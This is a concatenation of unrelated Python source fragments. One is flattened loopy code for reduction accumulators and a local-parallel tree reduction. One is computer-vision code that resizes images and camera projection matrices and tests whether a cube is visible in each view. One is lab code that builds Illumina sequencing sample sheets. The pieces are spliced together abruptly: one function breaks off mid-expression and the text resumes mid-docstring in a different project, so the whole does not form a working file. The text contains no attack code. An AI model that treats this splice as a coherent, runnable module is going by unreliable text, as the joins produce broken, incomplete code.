# This way, we may initialize a few too many accumulators, # but that's better than being incorrect. # https://github.com/inducer/loopy/issues/231 ) generated_insns.append(init_insn) update_id = insn_id_gen( based_on="{}_{}_update".format(insn.id, "_".join(expr.inames))) update_insn_iname_deps = insn.within_inames | set(expr.inames) if insn.within_inames_is_final: update_insn_iname_deps = insn.within_inames | set(expr.inames) reduction_insn_depends_on = {init_id} # In the case of a multi-argument reduction, we need a name for each of # the arguments in order to pass them to the binary op - so we expand # items that are not "plain" tuples here. if nresults > 1 and not isinstance(expr.expr, tuple): get_args_insn_id = insn_id_gen( "{}_{}_get".format(insn.id, "_".join(expr.inames))) reduction_expr = expand_inner_reduction( id=get_args_insn_id, expr=expr.expr, nresults=nresults, depends_on=insn.depends_on, within_inames=update_insn_iname_deps, within_inames_is_final=insn.within_inames_is_final, predicates=guarding_predicates, ) reduction_insn_depends_on.add(get_args_insn_id) else: reduction_expr = expr.expr expression, callables_table = expr.operation( arg_dtypes, _strip_if_scalar(acc_vars, acc_vars), reduction_expr, callables_table, kernel.target) reduction_insn = make_assignment( id=update_id, assignees=acc_vars, expression=expression, depends_on=frozenset(reduction_insn_depends_on) | insn.depends_on, within_inames=update_insn_iname_deps, within_inames_is_final=insn.within_inames_is_final, predicates=guarding_predicates,) generated_insns.append(reduction_insn) new_insn_add_depends_on.add(reduction_insn.id) if nresults == 1: assert len(acc_vars) == 1 return acc_vars[0], callables_table else: return acc_vars, callables_table # }}} # {{{ local-parallel def _get_int_iname_size(iname): from loopy.isl_helpers import static_max_of_pw_aff from loopy.symbolic import pw_aff_to_expr size = pw_aff_to_expr( static_max_of_pw_aff( kernel.get_iname_bounds(iname).size, 
constants_only=True)) assert isinstance(size, int) return size def _make_slab_set(iname, size): v = isl.make_zero_and_vars([iname]) bs, = ( v[0].le_set(v[iname]) & v[iname].lt_set(v[0] + size)).get_basic_sets() return bs def _make_slab_set_from_range(iname, lbound, ubound): v = isl.make_zero_and_vars([iname]) bs, = ( v[iname].ge_set(v[0] + lbound) & v[iname].lt_set(v[0] + ubound)).get_basic_sets() return bs def map_reduction_local(expr, rec, callables_table, nresults, arg_dtypes, reduction_dtypes, guarding_predicates): red_iname, = expr.inames size = _get_int_iname_size(red_iname) outer_insn_inames = insn.within_inames from loopy.kernel.data import LocalInameTagBase outer_local_inames = tuple(oiname for oiname in outer_insn_inames if kernel.iname_tags_of_type(oiname, LocalInameTagBase)) from pymbolic import var outer_local_iname_vars = tuple( var(oiname) for oiname in outer_local_inames) outer_local_iname_sizes = tuple( _get_int_iname_size(oiname) for oiname in outer_local_inames) from loopy.kernel.data import AddressSpace neutral_var_names = make_temporaries( name_based_on="neutral_"+red_iname, nvars=nresults, shape=(), dtypes=reduction_dtypes, address_space=AddressSpace.PRIVATE) acc_var_names = make_temporaries( name_based_on="acc_"+red_iname, nvars=nresults, shape=outer_local_iname_sizes + (size,), dtypes=reduction_dtypes, address_space=AddressSpace.LOCAL) acc_vars = tuple(var(n) for n in acc_var_names) # {{{ add separate iname to carry out the reduction # Doing this sheds any odd conditionals that may be active # on our red_iname. 
base_exec_iname = var_name_gen("red_"+red_iname) domains.append(_make_slab_set(base_exec_iname, size)) new_iname_tags[base_exec_iname] = kernel.iname_tags(red_iname) # }}} base_iname_deps = outer_insn_inames - frozenset(expr.inames) neutral, callables_table = expr.operation.neutral_element(*arg_dtypes, callables_table=callables_table, target=kernel.target) init_id = insn_id_gen(f"{insn.id}_{red_iname}_init") init_insn = make_assignment( id=init_id, assignees=tuple( acc_var[outer_local_iname_vars + (var(base_exec_iname),)] for acc_var in acc_vars), expression=neutral, within_inames=base_iname_deps | frozenset([base_exec_iname]), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset(), # Do not inherit predicates: Those might read variables # that may not yet be set, and we don't have a great way # of figuring out what the dependencies of the accumulator # initializer should be. # This way, we may initialize a few too many accumulators, # but that's better than being incorrect. # https://github.com/inducer/loopy/issues/231 ) generated_insns.append(init_insn) init_neutral_id = insn_id_gen(f"{insn.id}_{red_iname}_init_neutral") init_neutral_insn = make_assignment( id=init_neutral_id, assignees=tuple(var(nvn) for nvn in neutral_var_names), expression=neutral, within_inames=base_iname_deps | frozenset([base_exec_iname]), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset(), predicates=guarding_predicates, ) generated_insns.append(init_neutral_insn) transfer_depends_on = {init_neutral_id, init_id} # In the case of a multi-argument reduction, we need a name for each of # the arguments in order to pass them to the binary op - so we expand # items that are not "plain" tuples here. 
if nresults > 1 and not isinstance(expr.expr, tuple): get_args_insn_id = insn_id_gen( f"{insn.id}_{red_iname}_get") reduction_expr = expand_inner_reduction( id=get_args_insn_id, expr=expr.expr, nresults=nresults, depends_on=insn.depends_on, within_inames=( (outer_insn_inames - frozenset(expr.inames)) | frozenset([red_iname])), within_inames_is_final=insn.within_inames_is_final, predicates=guarding_predicates, ) transfer_depends_on.add(get_args_insn_id) else: reduction_expr = expr.expr transfer_id = insn_id_gen(f"{insn.id}_{red_iname}_transfer") expression, callables_table = expr.operation( arg_dtypes, _strip_if_scalar( neutral_var_names, tuple(var(nvn) for nvn in neutral_var_names)), reduction_expr, callables_table, kernel.target) transfer_insn = make_assignment( id=transfer_id, assignees=tuple( acc_var[outer_local_iname_vars + (var(red_iname),)] for acc_var in acc_vars), expression=expression, within_inames=( (outer_insn_inames - frozenset(expr.inames)) | frozenset([red_iname])), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset([init_id, init_neutral_id]) | insn.depends_on, no_sync_with=frozenset([(init_id, "any")]), predicates=insn.predicates, ) generated_insns.append(transfer_insn) cur_size = 1 while cur_size < size: cur_size *= 2 prev_id = transfer_id bound = size stage_exec_iname = None istage = 0 while cur_size > 1: new_size = cur_size // 2 assert new_size * 2 == cur_size stage_exec_iname = var_name_gen("red_%s_s%d" % (red_iname, istage)) domains.append(_make_slab_set(stage_exec_iname, bound-new_size)) new_iname_tags[stage_exec_iname] = kernel.iname_tags(red_iname) stage_id = insn_id_gen("red_%s_stage_%d" % (red_iname, istage)) expression, callables_table = expr.operation( arg_dtypes, _strip_if_scalar(acc_vars, tuple( acc_var[ outer_local_iname_vars + (var(stage_exec_iname),)] for acc_var in acc_vars)), _strip_if_scalar(acc_vars, tuple( acc_var[ outer_local_iname_vars + ( var(stage_exec_iname) + new_size,)] for acc_var in acc_vars)), 
callables_table, kernel.target) stage_insn = make_assignment( id=stage_id, assignees=tuple( acc_var[outer_local_iname_vars + (var(stage_exec_iname),)] for acc_var in acc_vars), expression=expression, within_inames=( base_iname_deps | frozenset([stage_exec_iname])), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset([prev_id]), predicates=insn.predicates, ) generated_insns.append(stage_insn) prev_id = stage_id cur_size = new_size bound = cur_size istage += 1 new_insn_add_depends_on.add(prev_id) new_insn_add_no_sync_with.add((prev_id, "any")) new_insn_add_within_inames.add(stage_exec_iname or base_exec_iname) if nresults == 1: assert len(acc_vars) == 1 return acc_vars[0][outer_local_iname_vars + (0,)], callables_table else: return [acc_var[outer_local_iname_vars + (0,)] for acc_var in acc_vars], callables_table # }}} # {{{ utils (stateful) from pytools import memoize @memoize def get_or_add_sweep_tracking_iname_and_domain( scan_iname,
    # (tail of image_compress_coef; its def line lies before this chunk)
    # NOTE(review): the left-hand side of this first assignment was cut off by
    # the chunk boundary - presumably "img_h_max = "; confirm in full source.
    np.max(img_h, axis=2)  # (N_Ms, N_pts)
    img_w_max = np.max(img_w, axis=2)
    img_h_min = np.min(img_h, axis=2)
    img_w_min = np.min(img_w, axis=2)
    # Per-view pixel extent of the cube divided by voxel count:
    # pixels per voxel along h and w.
    img_h_resol = (img_h_max - img_h_min + 0.0) / _cube_D_
    img_w_resol = (img_w_max - img_w_min + 0.0) / _cube_D_
    compress_h = compress_ratio * img_h_resol.mean() / image_compress_multiple
    compress_w = compress_ratio * img_w_resol.mean() / image_compress_multiple
    return ((compress_h), (compress_w))


# def resize_matrix(projection_M, compress_h_new, compress_w_new):
#     transform_matrix = np.array([[[1 / compress_w_new, 0, 0], [0, 1 / compress_h_new, 0], [0, 0, 1]]])
#     projection_M_new = np.matmul(transform_matrix, projection_M)
#
#     cameraTs = cameraPs2Ts(projection_M)
#     cameraTs_new = cameraPs2Ts(projection_M_new)
#     trans_vector = (cameraTs - cameraTs_new)[:, :, None]
#     identical_matrix = np.repeat(np.array([[[1, 0, 0], [0, 1, 0], [0, 0, 1]]]), cameraTs.shape[0], axis=0)
#     bottom_matrix = np.repeat(np.array([[[0, 0, 0, 1]]]), cameraTs.shape[0], axis=0)
#     transform_matrix2 = np.concatenate((identical_matrix, trans_vector), axis=2)
#     transform_matrix2 = np.concatenate((transform_matrix2, bottom_matrix), axis=1)
#     projection_M_new_f = np.concatenate((projection_M_new, bottom_matrix), axis=1)
#
#     projection_M_new = np.matmul(transform_matrix2, projection_M_new_f)
#     projection_M_new = projection_M_new[:, :3, :]
#     return projection_M_new


def resize_image_and_matrix(images,
                            projection_M,
                            cube_xyz_min,
                            cube_D_mm,
                            _cube_D_,
                            image_compress_multiple,
                            return_list=False,
                            compress_ratio=1.0):
    '''
    Compress images while guaranteeing that the camera positions do not change.

    :param images: all images of one model
        type: list or None
        if a list, each element is an image array of shape (img_h, img_w, 3)
    :param projection_M: camera matrices
        shape: (N_views, 3, 4)
    :param cube_xyz_min: min xyz coordinate
        shape: (3,) / (N_pts, 3); usually (3,) because we only sample one
        cube to judge the resize term
    :param cube_D_mm: cube edge length, float
    :param _cube_D_: cube size in voxels, int
    :param image_compress_multiple: same as param.image_compress_multiple
    :param return_list: bool; if False, return a stacked numpy array
    :param compress_ratio: see self.params.compress_ratio
    :return:
        if images is not None:
            images_resized: resized images, shape (N_view, img_h_new, img_w_new)
            projection_M_new: new camera P, shape (N_view, 3, 4)
            (compress_h_new, compress_w_new): (float, float)
        if images is None: only the matrix is changed:
            (None, projection_M_new, (compress_h_new, compress_w_new))

    NOTE(review): images[0].shape is read below BEFORE the
    `images is not None` check, so the documented images=None path would
    raise TypeError - confirm intended usage with callers.
    '''
    (compress_h, compress_w) = image_compress_coef(projection_M, cube_xyz_min, cube_D_mm, _cube_D_, image_compress_multiple, compress_ratio=compress_ratio)
    # Snap the resized extent to a multiple of image_compress_multiple.
    resized_h = int(image_compress_multiple * (images[0].shape[0] // (compress_h * image_compress_multiple)))
    resized_w = int(image_compress_multiple * (images[0].shape[1] // (compress_w * image_compress_multiple)))
    # Effective (post-snapping) compression factors actually applied.
    compress_h_new = images[0].shape[0] / (resized_h + 0.0)
    compress_w_new = images[0].shape[1] / (resized_w + 0.0)
    # Scale the intrinsics part of P to the new pixel grid.
    transform_matrix = np.array([[[1 / compress_w_new, 0, 0], [0, 1 / compress_h_new, 0], [0, 0, 1]]])
    projection_M_new = np.matmul(transform_matrix, projection_M)
    # Rescaling P moves the recovered camera center; build a world-space
    # translation that puts the center back where it was.
    cameraTs = cameraPs2Ts(projection_M)
    cameraTs_new = cameraPs2Ts(projection_M_new)
    trans_vector = (cameraTs - cameraTs_new)[:, :, None]
    identical_matrix = np.repeat(np.array([[[1, 0, 0], [0, 1, 0], [0, 0, 1]]]), cameraTs.shape[0], axis=0)
    bottom_matrix = np.repeat(np.array([[[0, 0, 0, 1]]]), cameraTs.shape[0], axis=0)
    transform_matrix2 = np.concatenate((identical_matrix, trans_vector), axis=2)
    transform_matrix2 = np.concatenate((transform_matrix2, bottom_matrix), axis=1)
    projection_M_new_f = np.concatenate((projection_M_new, bottom_matrix), axis=1)
    projection_M_new = np.matmul(transform_matrix2, projection_M_new_f)
    projection_M_new = projection_M_new[:, :3, :]
    image_resized_list = []
    if (images is not None):
        for image in images:
            # NOTE(review): scipy.misc.imresize was removed in SciPy >= 1.3;
            # this code requires an old SciPy (or porting to PIL/cv2).
            image_resized = scipy.misc.imresize(image, size=(resized_h, resized_w), interp='bicubic')
            # Normalize uint8 [0,255] to roughly [-0.5, 0.5).
            image_resized = image_resized / 256.0 - 0.5
            image_resized_list.append(image_resized)
        images_resized = image_resized_list if return_list else np.stack(image_resized_list)
        return (images_resized, projection_M_new, (compress_h_new, compress_w_new))
    else:
        return (None, projection_M_new, (compress_h_new, compress_w_new))


# def resize_multistage_image_and_matrix(images,
#                                        projection_M,
#                                        cube_xyz_min,
#                                        cube_D_mm,
#                                        _cube_D_,
#                                        image_compress_multiple,
#                                        image_compress_stage,
#                                        return_list=False,
#                                        compress_ratio=1.0):
#     '''
#     compress image and garantee the camera position is not changing
#     :param images: all images of one model
#         type:list or None
#         if list
#             list element: image array
#                 shape: (img_h,img_w, 3)
#     :param projection_M: camera matrix
#         shape: (N_views, 3, 4)
#     :param cube_xyz_min: min xyz coordinate
#         shape: (3,) / (N_pts, 3) usually it is (3,) because we only sample one cubic to judge the resize term
#     :param cube_D_mm: cubic length float
#     :param _cube_D_: cubic size int
#     :param image_compress_multiple: same as param.image_compress_multiple
#     :param image_compress_stage: same as param.image_compress_stage
#     :param return_list: bool
#         if False return the numpy array
#     :param compress_ratio: see self.params.compress_ratio
#     :return:
#         if image is not None
#             image_resized_stage_list: multistage of resized image
#                 length : = image_compress_stage
#                 ele in each list:
#                     shape:(N_view, img_h_new//2**iter, img_w_new//2**iter)
#             projection_M_new: new cameraP
#                 shape:(N_view,3,4)
#             (compress_h_new,compress_w_new):(float,float)
#         elif image is None: only change the matrix
#             projection_M_new: new cameraP
#                 shape:(N_view,3,4)
#             (compress_h_new,compress_w_new):(float,float)
#     '''
#     # (compress_h, compress_w) = image_compress_coef(projection_M,
#     #                                                cube_xyz_min,
#     #                                                cube_D_mm,
#     #                                                _cube_D_,
#     #                                                1,
#     #                                                compress_ratio = compress_ratio)
#     # print('compress_h', compress_h, compress_w)
#     compress_h = compress_ratio
#     compress_w = compress_ratio
#     resized_h = int(image_compress_multiple * (images[0].shape[0] // (compress_h * image_compress_multiple)))
#     resized_w = int(image_compress_multiple * (images[0].shape[1] // (compress_w * image_compress_multiple)))
#
#     # pdb.set_trace()
#     compress_h_new = images[0].shape[0] / (resized_h + 0.0)
#     compress_w_new = images[0].shape[1] / (resized_w + 0.0)
#     transform_matrix = np.array([[[1 / compress_w_new, 0, 0], [0, 1 / compress_h_new, 0], [0, 0, 1]]])
#     projection_M_new = np.matmul(transform_matrix, projection_M)
#
#     cameraTs = cameraPs2Ts(projection_M)
#     cameraTs_new = cameraPs2Ts(projection_M_new)
#     trans_vector = (cameraTs - cameraTs_new)[:, :, None]
#     identical_matrix = np.repeat(np.array([[[1, 0, 0], [0, 1, 0], [0, 0, 1]]]), cameraTs.shape[0], axis=0)
#     bottom_matrix = np.repeat(np.array([[[0, 0, 0, 1]]]), cameraTs.shape[0], axis=0)
#     transform_matrix2 = np.concatenate((identical_matrix, trans_vector), axis=2)
#     transform_matrix2 = np.concatenate((transform_matrix2, bottom_matrix), axis=1)
#     projection_M_new_f = np.concatenate((projection_M_new, bottom_matrix), axis=1)
#
#     projection_M_new = np.matmul(transform_matrix2, projection_M_new_f)
#     projection_M_new = projection_M_new[:, :3, :]
#
#     if (images is not None):
#         image_resized_stage_list = []
#         for iter in range(image_compress_stage):
#             image_resized_list = []
#             for image in images:
#                 # print('resized image shape',resized_h, resized_w)
#                 image_resized = scipy.misc.imresize(image,
#                                                     size=(int(resized_h // (2 ** iter)), int(resized_w // (2 ** iter))),
#                                                     interp='bicubic')
#                 image_resized = image_resized / 256.0 - 0.5
#                 image_resized_list.append(image_resized)
#             images_resized = image_resized_list if return_list else np.stack(image_resized_list)
#             image_resized_stage_list.append(images_resized)
#         return (image_resized_stage_list, projection_M_new, (compress_h_new, compress_w_new))
#     else:
#         return (None, projection_M_new, (compress_h_new, compress_w_new))


def judge_cubic_center_in_view(projection_M,
                               xyz_3D,
                               cube_length,
                               image_shape,
                               ):
    '''
    Per-view flag: True when all 8 corners of the cube anchored at xyz_3D
    with edge length cube_length project inside the image bounds.

    :param projection_M: shape: (N_views, 3, 4)
    :param xyz_3D: shape: (3,) - min corner of the cube
    :param cube_length: float - cube edge length
    :param image_shape: (img_h, img_w)
    :return:
        view_in_flag: bool array, shape (N_views)
    '''
    # Project each of the 8 cube corners (suffix encodes which axes get
    # +cube_length: e.g. 101 -> x and z offset).
    img_h_new, img_w_new = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D,
    )
    img_h_100, img_w_100 = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D + np.array((cube_length, 0, 0)),
    )
    img_h_010, img_w_010 = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D + np.array((0, cube_length, 0)),
    )
    img_h_001, img_w_001 = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D + np.array((0, 0, cube_length)),
    )
    img_h_011, img_w_011 = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D + np.array((0, cube_length, cube_length)),
    )
    img_h_101, img_w_101 = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D + np.array((cube_length, 0, cube_length)),
    )
    img_h_110, img_w_110 = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D + np.array((cube_length, cube_length, 0)),
    )
    img_h_111, img_w_111 = perspectiveProj(
        projection_M=projection_M,
        xyz_3D=xyz_3D + cube_length,
    )
    # Elementwise bool products act as logical AND over all corner checks.
    img_h_bool = (img_h_new < image_shape[0]) * (img_h_new > 0)
    img_w_bool = (img_w_new < image_shape[1]) * (img_w_new > 0)
    img_h_bool_001 = (img_h_001 < image_shape[0]) * (img_h_001 > 0)
    img_w_bool_001 = (img_w_001 < image_shape[1]) * (img_w_001 > 0)
    img_h_bool_010 = (img_h_010 < image_shape[0]) * (img_h_010 > 0)
    img_w_bool_010 = (img_w_010 < image_shape[1]) * (img_w_010 > 0)
    img_h_bool_100 = (img_h_100 < image_shape[0]) * (img_h_100 > 0)
    img_w_bool_100 = (img_w_100 < image_shape[1]) * (img_w_100 > 0)
    img_h_bool_011 = (img_h_011 < image_shape[0]) * (img_h_011 > 0)
    img_w_bool_011 = (img_w_011 < image_shape[1]) * (img_w_011 > 0)
    img_h_bool_110 = (img_h_110 < image_shape[0]) * (img_h_110 > 0)
    img_w_bool_110 = (img_w_110 < image_shape[1]) * (img_w_110 > 0)
    img_h_bool_101 = (img_h_101 < image_shape[0]) * (img_h_101 > 0)
    img_w_bool_101 = (img_w_101 < image_shape[1]) * (img_w_101 > 0)
    img_h_bool_111 = (img_h_111 < image_shape[0]) * (img_h_111 > 0)
    img_w_bool_111 = (img_w_111 < image_shape[1]) * (img_w_111 > 0)
    view_in_flag = img_h_bool * img_w_bool * img_h_bool_001 * img_w_bool_001 * img_h_bool_010 * img_w_bool_010 * img_h_bool_100 * img_w_bool_100 * img_h_bool_110 * img_w_bool_110 * img_h_bool_101 * img_w_bool_101 * img_h_bool_011 * img_w_bool_011 * img_h_bool_111 * img_w_bool_111
    print('the bool flag of each view can see the center of cubic:', view_in_flag.sum())
    return view_in_flag[:, 0]


def count_gx_gy(projection_M, h_length=1, w_length=1):
    '''
    Back-project three reference pixels ((w_length, 0), (0, h_length), (0, 0))
    at unit depth and measure world-space distances between them, giving the
    per-view world-space footprint of a pixel step along x and y.

    :param projection_M: camera matrices, shape (N_views, 3, 4)
    :param h_length, w_length: pixel step sizes
    :return: (gx, gy), each shape (N_views)
    '''
    projection_M_inverse = inverse_camera_matrix(projection_M)
    N_view = projection_M_inverse.shape[0]  # NOTE(review): unused here
    # Homogeneous pixel coordinates (u, v, 1, 1) broadcast over views.
    vector_101 = np.array(([w_length, 0, 1, 1]))[None, :, None]
    vector_011 = np.array(([0, h_length, 1, 1]))[None, :, None]
    vector_001 = np.array(([0, 0, 1, 1]))[None, :, None]
    global_101 = np.matmul(projection_M_inverse, vector_101)[:, :3, 0]  # shape: (N_view, 4,1)->(N_view, 3)
    global_011 = np.matmul(projection_M_inverse, vector_011)[:, :3, 0]
    global_001 = np.matmul(projection_M_inverse, vector_001)[:, :3, 0]
    gx = np.linalg.norm(global_101 - global_001, axis=1)  # shape: (N_views)
    gy = np.linalg.norm(global_011 - global_001, axis=1)
    return (gx, gy)


def generateMetaVector_old(
        projection_M,
        cube_xyz_min,
        cameraTs,
        cube_D_resol,
        _cube_D_,
):
    '''
    :param projection_M: shape:(N_views, 3, 4)
    :param cube_xyz_min: shape:(,3)
    :param cameraTs: shape:(N_views, 3)
    :param cube_D_resol: resolution of each voxel, float
    :param _cube_D_: length of cube, int
    :return:
        meta_vector: the array of each vector representing camera position
            shape: (N_views, _cube_D_, _cube_D_, _cube_D_, 10)
        wrapping_vector: the map from each voxel to image
            shape: (N_views, _cube_D_, _cube_D_, _cube_D_, 3)
    '''
    x = np.arange(0, _cube_D_, 1.0)
    y = np.arange(0, _cube_D_, 1.0)
    z = np.arange(0, _cube_D_, 1.0)
    if not (x.shape[0] == _cube_D_):
        print('shape of Meta vector went wrong')
        raise TypeError
    xx, yy, zz = np.meshgrid(x, y, z)
    XYZ = np.array([yy.flatten(), xx.flatten(), zz.flatten()]).reshape(3, _cube_D_, _cube_D_, _cube_D_)
    XYZ = np.moveaxis(XYZ, 0, 3)
    if not (list(XYZ[0, 1, 3, :])
use as a directory name Multiple disallowed characters in a row are substituted with a single instance of the relevant replacement character: e.g., Hello,,,,Sunshine becomes Hello-Sunshine Parameters ---------- x : str Returns ------- str the input string with whitespaces replaced with underscores and any other non-alphanumeric, non-hyphen, non-underscore characters replaced with a hyphen. """ # Replace any whitespace(s) with underscore x = re.sub(r"\s+", '_', x) # Replace any other character that is not alphanumeric, an underscore, # or a hyphen (and thus valid in a folder name) with a hyphen x = re.sub('[^0-9a-zA-Z-_]+', '-', x) return x @staticmethod def _reverse_complement(seq): """Reverse-complement a sequence From http://stackoverflow.com/a/25189185/7146785 Parameters ---------- seq : str The sequence to reverse-complement Returns ------- str The reverse-complemented sequence """ complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'} rev_seq = "".join(complement.get(base, base) for base in reversed(seq)) return rev_seq @staticmethod def _sequencer_i5_index(sequencer, indices): """Decides if the indices should be reversed based on the sequencer """ revcomp_sequencers = ['HiSeq4000', 'MiniSeq', 'NextSeq', 'HiSeq3000'] other_sequencers = ['HiSeq2500', 'HiSeq1500', 'MiSeq', 'NovaSeq'] if sequencer in revcomp_sequencers: return [SequencingProcess._reverse_complement(x) for x in indices] elif sequencer in other_sequencers: return indices else: raise ValueError( 'Your indicated sequencer [%s] is not recognized.\nRecognized ' 'sequencers are: \n' % ' '.join(revcomp_sequencers + other_sequencers)) @staticmethod def _format_sample_sheet_data(sample_ids, i7_name, i7_seq, i5_name, i5_seq, sample_projs, wells=None, sample_plates=None, description=None, lanes=None, sep=',', include_header=True, include_lane=True): """Creates the [Data] component of the Illumina sample sheet Parameters ---------- sample_ids: array-like The bcl2fastq-compatible sample ids i7_name: array-like 
The i7 index name, in sample_ids order i7_seq: array-like The i7 sequences, in sample_ids order i5_name: array-like The i5 index name, in sample_ids order i5_seq: array-like The i5 sequences, in sample_ids order wells: array-like, optional The well in which the sample is found on the compressed gDNA plate, in sample_ids order. Default: None sample_plate: str, optional The human-readable *sample* plate name. Default: '' NB: This is NOT the plate that the well, above, is relevant to. This fact is not a bug but rather a user requirement per <NAME>. sample_projs: array-like The per-sample short project names for use in grouping demultiplexed samples description: array-like, optional The original sample ids, in sample_ids order. Default: None lanes: array-like, optional The lanes in which the pool will be sequenced. Default: [1] sep: str, optional The file-format separator. Default: ',' include_header: bool, optional Whether to include the header or not. Default: true include_lane: bool, optional Whether to include lane index as the first column. 
Default: true Returns ------- str The formatted [Data] component of the Illumina sample sheet Raises ------ ValueError If sample_ids, i7_name, i7_seq, i5_name and i5_seq do not have all the same length """ if sample_plates is None: sample_plates = [''] * len(sample_ids) if (len(sample_ids) != len(i7_name) != len(i7_seq) != len(i5_name) != len(i5_seq) != len(sample_plates)): raise ValueError('Sample information lengths are not all equal') if wells is None: wells = [''] * len(sample_ids) if description is None: description = [''] * len(sample_ids) if lanes is None: lanes = [1] data = [] for lane in lanes: for i, sample in enumerate(sample_ids): row = [sample, sample, sample_plates[i], wells[i], i7_name[i], i7_seq[i], i5_name[i], i5_seq[i], sample_projs[i], description[i]] if include_lane: row.insert(0, str(lane)) data.append(sep.join(row)) data = sorted(data) if include_header: columns = [ 'Sample_ID', 'Sample_Name', 'Sample_Plate', 'Sample_Well', 'I7_Index_ID', 'index', 'I5_Index_ID', 'index2', 'Sample_Project', 'Well_Description'] if include_lane: columns.insert(0, 'Lane') data.insert(0, sep.join(columns)) return '\n'.join(data) @staticmethod def _format_sample_sheet_comments(principal_investigator=None, contacts=None, other=None, sep=','): """Formats the sample sheet comments Parameters ---------- principal_investigator: dict, optional The principal investigator information: {name: email} contacts: dict, optional The contacts information: {name: email} other: str, optional Other information to include in the sample sheet comments sep: str, optional The sample sheet separator Returns ------- str The formatted comments of the sample sheet """ comments = [] if principal_investigator is not None: comments.append('PI{0}{1}\n'.format( sep, sep.join( '{0}{1}{2}'.format(x, sep, principal_investigator[x]) for x in principal_investigator.keys()))) if contacts is not None: comments.append( 'Contact{0}{1}\nContact emails{0}{2}\n'.format( sep, sep.join(x for x in 
sorted(contacts.keys())), sep.join(contacts[x] for x in sorted(contacts.keys())))) if other is not None: comments.append('%s\n' % other) return ''.join(comments) @staticmethod def _set_control_values_to_plate_value(input_df, plate_col_name, projname_col_name): """ Update project name for control samples Ensure that each sample plate included in the dataframe does not contain experimental samples with more than (or less than) one value in the column named projname_col_name. Assuming this is true, set the project column value for each non-experimental sample to the value of the project name for the (single) project on the non-experimental sample's plate. Parameters ---------- input_df: pandas.DataFrame A dataframe containing (at least) a column of plate names (having the column name given in plate_col_name) and a column of project names (having the column name given in projname_col_name)--e.g., Project Name on prep sheet or sample_proj_name on sample sheet-- and one row for each sample (both experimental and non- experimental). The value in the project name column must be None for control (blank/positive control/etc) samples. plate_col_name: str The name of the column in input_df that contains the name of the plate on which a given sample lies. projname_col_name: str The name of the column in input_df that contains the name of the project associated with the given sample. Returns ------- result_df: pandas.DataFrame A copy of the input dataframe, modified so that the controls have the same (single) project name as the experimental samples on their sample plate. Raises ------ ValueError If any plate contains experimental samples from more (or fewer) than one project. 
""" assert plate_col_name in input_df.columns.values assert projname_col_name in input_df.columns.values result_df = input_df.copy() problem_plate_messages = [] # create a mask to define all the NON-control rows for this plate non_controls_mask = input_df[projname_col_name].notnull() # get all the unique plates in the dataframe unique_plates = input_df[plate_col_name].unique() for curr_unique_plate in unique_plates: # create a mask to define all the rows for this plate plate_mask = input_df[plate_col_name] == curr_unique_plate # create a mask to define all the rows for this plate where the # project name is NOT the control value (None) plate_non_controls_mask = plate_mask & non_controls_mask # get unique project names for the part of df defined in the mask curr_plate_non_controls = input_df[plate_non_controls_mask] curr_plate_projnames = curr_plate_non_controls[projname_col_name] curr_unique_projnames = curr_plate_projnames.unique() if len(curr_unique_projnames) != 1: # Note that we don't error out the first time we find a # plate that doesn't meet expectations; instead we continue to # run through all the plates and identify ALL those that don't # meet expectations. This way the user can correct all of them # at once. 
curr_err_msg = "Expected one unique value for plate '{0}' " \ "but received {1}: {2}" upn = ", ".join([str(x) for x in curr_unique_projnames]) curr_err_msg = curr_err_msg.format(curr_unique_plate, len(curr_unique_projnames), upn) problem_plate_messages.append(curr_err_msg) else: # create a mask to define all the rows for this plate where the # projname IS the control value (None); ~ "nots" a whole series plate_controls_mask = plate_mask & (~non_controls_mask) # ok to just take first non-control projname because we # verified above there is only one value there anyway result_df.loc[plate_controls_mask, projname_col_name] = \ curr_unique_projnames[0] # end if # next unique plate if len(problem_plate_messages) > 0: raise ValueError("\n".join(problem_plate_messages)) return result_df def _format_sample_sheet(self, data, sep=','): """Formats Illumina-compatible sample sheet. Parameters ---------- data: array-like of str A list of strings containing formatted strings to include in the [Data] component of the sample sheet Returns ------- sample_sheet : str the sample sheet string """ contacts = {c.name: c.email for c in self.contacts} principal_investigator = {self.principal_investigator.name: self.principal_investigator.email} sample_sheet_dict = { 'comments': SequencingProcess._format_sample_sheet_comments( principal_investigator=principal_investigator, contacts=contacts), 'IEMFileVersion': '4', 'Investigator Name': self.principal_investigator.name, 'Experiment Name': self.experiment, 'Date': datetime.strftime(self.date, Process.get_date_format()), 'Workflow': 'GenerateFASTQ', 'Application': 'FASTQ Only', 'Assay': 'TruSeq HT' if self.is_amplicon_assay else self.assay, 'Description': '', 'Chemistry': 'Amplicon' if self.is_amplicon_assay else 'Default', 'read1': self.fwd_cycles, 'read2': self.rev_cycles, 'ReverseComplement': '0', 'data': data} if self.is_amplicon_assay: # these sequences are constant for all TruSeq HT assays # 
https://support.illumina.com/bulletins/2016/12/what-sequences-do- # i-use-for-adapter-trimming.html sample_sheet_dict['Adapter'] = 'AGATCGGAAGAGCACACGTCTGAACTCCAGTCA' sample_sheet_dict['AdapterRead2'] = ( 'AGATCGGAAGAGCGTCGTGTAGGGAAAGAGTGT') template = ( '{comments}[Header]\nIEMFileVersion{sep}{IEMFileVersion}\n' 'Investigator Name{sep}{Investigator Name}\n' 'Experiment Name{sep}{Experiment Name}\nDate{sep}{Date}\n' 'Workflow{sep}{Workflow}\nApplication{sep}{Application}\n' 'Assay{sep}{Assay}\nDescription{sep}{Description}\n' 'Chemistry{sep}{Chemistry}\n\n[Reads]\n{read1}\n{read2}\n\n' '[Settings]\nReverseComplement{sep}{ReverseComplement}\n' 'Adapter{sep}{Adapter}\nAdapterRead2{sep}{AdapterRead2}\n\n' '[Data]\n{data}'
